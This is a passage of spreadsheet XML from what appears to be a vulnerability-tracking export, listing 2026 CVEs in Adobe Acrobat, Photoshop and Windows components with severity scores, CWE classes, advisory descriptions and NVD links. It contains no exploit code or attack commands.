          <t>CWE-787</t>
        </is>
      </c>
      <c r="S658" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T658" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81979</t>
        </is>
      </c>
    </row>
    <row r="659">
      <c r="A659" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B659" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C659" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81980</t>
        </is>
      </c>
      <c r="D659" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E659" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F659" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G659" s="5" t="inlineStr"/>
      <c r="H659" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I659" s="5" t="inlineStr"/>
      <c r="J659" s="5" t="inlineStr"/>
      <c r="K659" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L659" s="5" t="inlineStr"/>
      <c r="M659" s="5" t="inlineStr"/>
      <c r="N659" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O659" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P659" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q659" s="5" t="inlineStr"/>
      <c r="R659" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S659" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T659" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81980</t>
        </is>
      </c>
    </row>
    <row r="660">
      <c r="A660" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B660" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C660" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81981</t>
        </is>
      </c>
      <c r="D660" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E660" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F660" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G660" s="5" t="inlineStr"/>
      <c r="H660" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I660" s="5" t="inlineStr"/>
      <c r="J660" s="5" t="inlineStr"/>
      <c r="K660" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L660" s="5" t="inlineStr"/>
      <c r="M660" s="5" t="inlineStr"/>
      <c r="N660" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O660" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P660" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q660" s="5" t="inlineStr"/>
      <c r="R660" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S660" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T660" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81981</t>
        </is>
      </c>
    </row>
    <row r="661">
      <c r="A661" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B661" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C661" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81983</t>
        </is>
      </c>
      <c r="D661" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E661" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F661" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G661" s="5" t="inlineStr"/>
      <c r="H661" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I661" s="5" t="inlineStr"/>
      <c r="J661" s="5" t="inlineStr"/>
      <c r="K661" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L661" s="5" t="inlineStr"/>
      <c r="M661" s="5" t="inlineStr"/>
      <c r="N661" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O661" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P661" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q661" s="5" t="inlineStr"/>
      <c r="R661" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S661" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T661" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81983</t>
        </is>
      </c>
    </row>
    <row r="662">
      <c r="A662" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B662" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C662" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81985</t>
        </is>
      </c>
      <c r="D662" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E662" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F662" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G662" s="5" t="inlineStr"/>
      <c r="H662" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I662" s="5" t="inlineStr"/>
      <c r="J662" s="5" t="inlineStr"/>
      <c r="K662" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L662" s="5" t="inlineStr"/>
      <c r="M662" s="5" t="inlineStr"/>
      <c r="N662" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O662" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P662" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q662" s="5" t="inlineStr"/>
      <c r="R662" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S662" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T662" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81985</t>
        </is>
      </c>
    </row>
    <row r="663">
      <c r="A663" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B663" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C663" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81986</t>
        </is>
      </c>
      <c r="D663" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E663" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F663" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G663" s="5" t="inlineStr"/>
      <c r="H663" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I663" s="5" t="inlineStr"/>
      <c r="J663" s="5" t="inlineStr"/>
      <c r="K663" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L663" s="5" t="inlineStr"/>
      <c r="M663" s="5" t="inlineStr"/>
      <c r="N663" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O663" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P663" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q663" s="5" t="inlineStr"/>
      <c r="R663" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S663" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T663" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81986</t>
        </is>
      </c>
    </row>
    <row r="664">
      <c r="A664" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B664" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C664" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81987</t>
        </is>
      </c>
      <c r="D664" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E664" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F664" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G664" s="5" t="inlineStr"/>
      <c r="H664" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I664" s="5" t="inlineStr"/>
      <c r="J664" s="5" t="inlineStr"/>
      <c r="K664" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L664" s="5" t="inlineStr"/>
      <c r="M664" s="5" t="inlineStr"/>
      <c r="N664" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O664" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P664" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q664" s="5" t="inlineStr"/>
      <c r="R664" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S664"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T664" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81987</t>
        </is>
      </c>
    </row>
    <row r="665">
      <c r="A665" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B665" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C665" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81988</t>
        </is>
      </c>
      <c r="D665" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E665" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F665" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G665" s="5" t="inlineStr"/>
      <c r="H665" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I665" s="5" t="inlineStr"/>
      <c r="J665" s="5" t="inlineStr"/>
      <c r="K665" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L665" s="5" t="inlineStr"/>
      <c r="M665" s="5" t="inlineStr"/>
      <c r="N665" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O665" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P665" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q665" s="5" t="inlineStr"/>
      <c r="R665" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S665" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T665" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81988</t>
        </is>
      </c>
    </row>
    <row r="666">
      <c r="A666" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B666" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C666" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81989</t>
        </is>
      </c>
      <c r="D666" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E666" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F666" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G666" s="5" t="inlineStr"/>
      <c r="H666" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I666" s="5" t="inlineStr"/>
      <c r="J666" s="5" t="inlineStr"/>
      <c r="K666" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L666" s="5" t="inlineStr"/>
      <c r="M666" s="5" t="inlineStr"/>
      <c r="N666" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O666" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P666" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q666" s="5" t="inlineStr"/>
      <c r="R666" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S666" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T666" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81989</t>
        </is>
      </c>
    </row>
    <row r="667">
      <c r="A667" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B667" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C667" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81990</t>
        </is>
      </c>
      <c r="D667" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E667" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F667" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G667" s="5" t="inlineStr"/>
      <c r="H667" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I667" s="5" t="inlineStr"/>
      <c r="J667" s="5" t="inlineStr"/>
      <c r="K667" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L667" s="5" t="inlineStr"/>
      <c r="M667" s="5" t="inlineStr"/>
      <c r="N667" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O667" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P667" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q667" s="5" t="inlineStr"/>
      <c r="R667" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S667" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Use After Free vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T667" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81990</t>
        </is>
      </c>
    </row>
    <row r="668">
      <c r="A668" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B668" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C668" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81992</t>
        </is>
      </c>
      <c r="D668" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E668" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F668" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G668" s="5" t="inlineStr"/>
      <c r="H668" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I668" s="5" t="inlineStr"/>
      <c r="J668" s="5" t="inlineStr"/>
      <c r="K668" s="5" t="inlineStr">
        <is>
          <t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L668" s="5" t="inlineStr"/>
      <c r="M668" s="5" t="inlineStr"/>
      <c r="N668" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O668" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P668" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q668" s="5" t="inlineStr"/>
      <c r="R668" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S668" s="5" t="inlineStr">
        <is>
          <t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T668" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81992</t>
        </is>
      </c>
    </row>
    <row r="669">
      <c r="A669" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B669" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C669" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82005</t>
        </is>
      </c>
      <c r="D669" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E669" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F669" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G669" s="5" t="inlineStr"/>
      <c r="H669" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I669" s="5" t="inlineStr"/>
      <c r="J669" s="5" t="inlineStr"/>
      <c r="K669" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L669" s="5" t="inlineStr"/>
      <c r="M669" s="5" t="inlineStr"/>
      <c r="N669" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O669" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P669" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q669" s="5" t="inlineStr"/>
      <c r="R669" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S669" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="T669" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82005</t>
        </is>
      </c>
    </row>
    <row r="670">
      <c r="A670" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B670" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C670" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82006</t>
        </is>
      </c>
      <c r="D670" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E670" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F670" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G670" s="5" t="inlineStr"/>
      <c r="H670" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I670" s="5" t="inlineStr"/>
      <c r="J670" s="5" t="inlineStr"/>
      <c r="K670" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L670" s="5" t="inlineStr"/>
      <c r="M670" s="5" t="inlineStr"/>
      <c r="N670" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O670" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P670" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q670" s="5" t="inlineStr"/>
      <c r="R670" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S670"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T670" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82006</t>
        </is>
      </c>
    </row>
    <row r="671">
      <c r="A671" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B671" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C671" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82007</t>
        </is>
      </c>
      <c r="D671" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E671" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F671" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G671" s="5" t="inlineStr"/>
      <c r="H671" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I671" s="5" t="inlineStr"/>
      <c r="J671" s="5" t="inlineStr"/>
      <c r="K671" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L671" s="5" t="inlineStr"/>
      <c r="M671" s="5" t="inlineStr"/>
      <c r="N671" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O671" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P671" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="Q671" s="5" t="inlineStr"/>
      <c r="R671" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S67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T671" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82007</t>
        </is>
      </c>
    </row>
    <row r="672">
      <c r="A672" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B672" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C672" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83498</t>
        </is>
      </c>
      <c r="D672" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E672" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F672" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G672" s="5" t="inlineStr"/>
      <c r="H672" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I672" s="5" t="inlineStr"/>
      <c r="J672" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K672" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L672" s="5" t="inlineStr"/>
      <c r="M672" s="5" t="inlineStr"/>
      <c r="N672" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O672" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P672" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q672" s="5" t="inlineStr"/>
      <c r="R672" s="5" t="inlineStr">
        <is>
          <t>CWE-822</t>
        </is>
      </c>
      <c r="S672" s="5" t="inlineStr">
        <is>
          <t>Untrusted pointer dereference in Windows Virtualization-Based Security (VBS) Enclave allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T672" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83498</t>
        </is>
      </c>
    </row>
    <row r="673">
      <c r="A673" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B673" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C673" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83942</t>
        </is>
      </c>
      <c r="D673" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E673" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F673" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G673" s="5" t="inlineStr"/>
      <c r="H673" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I673" s="5" t="inlineStr"/>
      <c r="J673" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K67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673" s="5" t="inlineStr"/>
      <c r="M673" s="5" t="inlineStr"/>
      <c r="N673" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O673" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P673" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q673" s="5" t="inlineStr"/>
      <c r="R673" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="S673" s="5" t="inlineStr">
        <is>
          <t>Missing authorization in Windows Kernel allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T673" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83942</t>
        </is>
      </c>
    </row>
    <row r="674">
      <c r="A674" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B674" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C674" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83952</t>
        </is>
      </c>
      <c r="D674" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E674" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F674" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G674" s="5" t="inlineStr"/>
      <c r="H674" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I674" s="5" t="inlineStr"/>
      <c r="J674" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K674" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L674" s="5" t="inlineStr"/>
      <c r="M674" s="5" t="inlineStr"/>
      <c r="N674" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O674" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P674" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q674" s="5" t="inlineStr"/>
      <c r="R674" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S674" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Resilient File System (ReFS) allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T674" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83952</t>
        </is>
      </c>
    </row>
    <row r="675">
      <c r="A675" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B675" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C675" s="5" t="inlineStr">
        <is>
